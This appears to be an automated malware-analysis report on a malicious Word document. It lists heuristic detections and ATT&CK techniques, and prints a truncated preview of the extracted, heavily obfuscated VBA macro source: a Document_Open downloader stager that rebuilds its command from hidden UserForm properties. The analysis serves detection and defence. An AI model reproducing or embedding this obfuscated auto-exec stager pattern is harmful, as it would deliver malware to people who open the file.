MALICIOUS
262
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The file contains VBA macros, specifically a Document_Open macro that utilizes CreateObject and a hidden UserForm to execute code. This pattern is indicative of a downloader or stager designed to fetch and run additional malicious content. ClamAV detection further supports its malicious nature, identifying it as Doc.Downloader.Sagent-7454445-0. The specific obfuscation and lack of clear network indicators prevent definitive family attribution.
Heuristics 7
-
ClamAV: Doc.Downloader.Sagent-7454445-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Sagent-7454445-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA UserForm hidden-property command stager critical OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGERVBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive.
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 10946 bytes |
SHA-256: 8495340664534ab71148e9fa8c1206b3621a39d006fdb47cb146c469f25588ae |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Xmtcmcovmi"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "Zepmlzbwtd, 0, 0, MSForms, TextBox"
Private Sub Document_open()
Rbheeuczuaa = Gxrukoktavibm
Dompqccdqcind = Iiulysaldrcy
Ycrwgwgol = Dubrcagaimaga
Select _
Case Dcixnelx
Case 621
Qrxwmuxg _
= Hex _
(931)
Xyubqvxjtyvr = CVar(619)
Sdfnasrx _
= Hex(243)
Case 261
Ljjdvscaleg = CVar(121)
Hhsgbdsez _
= 28
Eiojgwdapdph = CDate _
(56)
Case 646
Nbvvfrvnvxgi = _
CInt(788)
Trmlonyndsu = Log(Fpfrzflo)
Judzqnqdxknhx = Szvaxcaqp
End Select
Wxyyfcuajiy = Ubrykrbtb
Zptoummdgm = Veclfzpmd
Lcbngutyvuo = Iggwwuruywv
Select _
Case Gwtlqgjail
Case 930
Fjnnakgfmczst _
= Hex _
(67)
Yumfftynx = CVar(97)
Dippaunxql _
= Hex(575)
Case 201
Ymppwdxar = CVar(143)
Kfvfnggvqjpgy _
= 896
Bffwzxuontqeb = CDate _
(655)
Case 489
Dsdkfjfozrkpn = _
CInt(65)
Fqazbsvvba = Log(Hmxcelqfwdn)
Wqfepigreoz = Ighxbkps
End Select
Zgewhemwrzvse = Ehukrdgrajm
Ojqeaobvjdr = Etlelbmygegsu
Oemujyihiqrp = Ueceszmgvxli
Select _
Case Ekmguigfq
Case 402
Awmdotlifladn _
= Hex _
(660)
Giipjbjacydl = CVar(697)
Mpofhrdacgdza _
= Hex(546)
Case 807
Egzeycxwanvrv = CVar(445)
Kiqmtwlyg _
= 833
Fgcmkbzexreg = CDate _
(798)
Case 95
Osnsmahqxwui = _
CInt(963)
Zsisugwruod = Log(Rlnfcusedxft)
Pifrbniefj = Pwxyzosiqe
End Select
Szurvytvyyqw
End Sub
Attribute VB_Name = "Rlndryuf"
Attribute VB_Base = "0{53A8F9CE-F62A-424E-B48F-7773908C8B41}{98A791E9-1E45-466D-8930-7B5DEEEE7885}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Sfxuqprex"
Function Gffrrmoptrb()
Pqtrejezznzb = Kasmtzhjhjls
Kttkhaqapomnr = Orkhyodbgzo
Ikgmzfpfu = Jajkdzgidtsr
Select _
Case Kkgsmktnks
Case 452
Anlokubpx _
= Hex _
(634)
Tygtgjmpt = CVar(250)
Ovinhfbw _
= Hex(417)
Case 906
Fuyswpjypln = CVar(20)
Nufrmdydl _
= 899
Yqfwnwob = CDate _
(947)
Case 866
Odiajudrdum = _
CInt(78)
Vtbnosrntry = Log(Jmkswmeqz)
Qdivmhinwakdl = Iqbuljhd
End Select
Wcqjsesti = Xmtcmcovmi.Zepmlzbwtd
Qswfsxekcft = Mtbbpcur
Uszoieuwtnhh = Bzacvridzpm
Vitpxbybn = Vfiiaqsfjm
Select _
Case Brwylqtkczv
Case 592
Zyjgmnngrhp _
= Hex _
(681)
Diwhzwvr = CVar(966)
Bcmkthgvjjuar _
= Hex(879)
Case 330
Wymjjkhplnkou = CVar(521)
Cwhaidaduzllf _
= 349
Dqnhcyjih = CDate _
(699)
Case 131
Naxjsmvkgxsr = _
CInt(414)
Wurkyzbqfktbm = Log(Toanppzg)
Zqvrikznl = Rxinrxvm
End Select
Nhgjclmumuee = Wcqjsesti + Rlndryuf.Qgqdkfeugdwb + Rlndryuf.Mqzqbhomi + Rlndryuf.Cighjeqo
Csgrspqptzf = Rezgxsbuauv
Bumpkdxaqb = Fvfuqrqzeup
Dsaucxkzjowce = Lqbchqsw
Select _
Case Jdesehef
Case 984
Lxfodgpvh _
= Hex _
(940)
Mcpootnzjkve = CVar(58)
Uggegrxphqnk _
= Hex(435)
Case 966
Bbwpnixbpeqnq = CVar(316)
Wqtlvjair _
= 407
Uxuyaegpxho = CDate _
(105)
Case 6
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.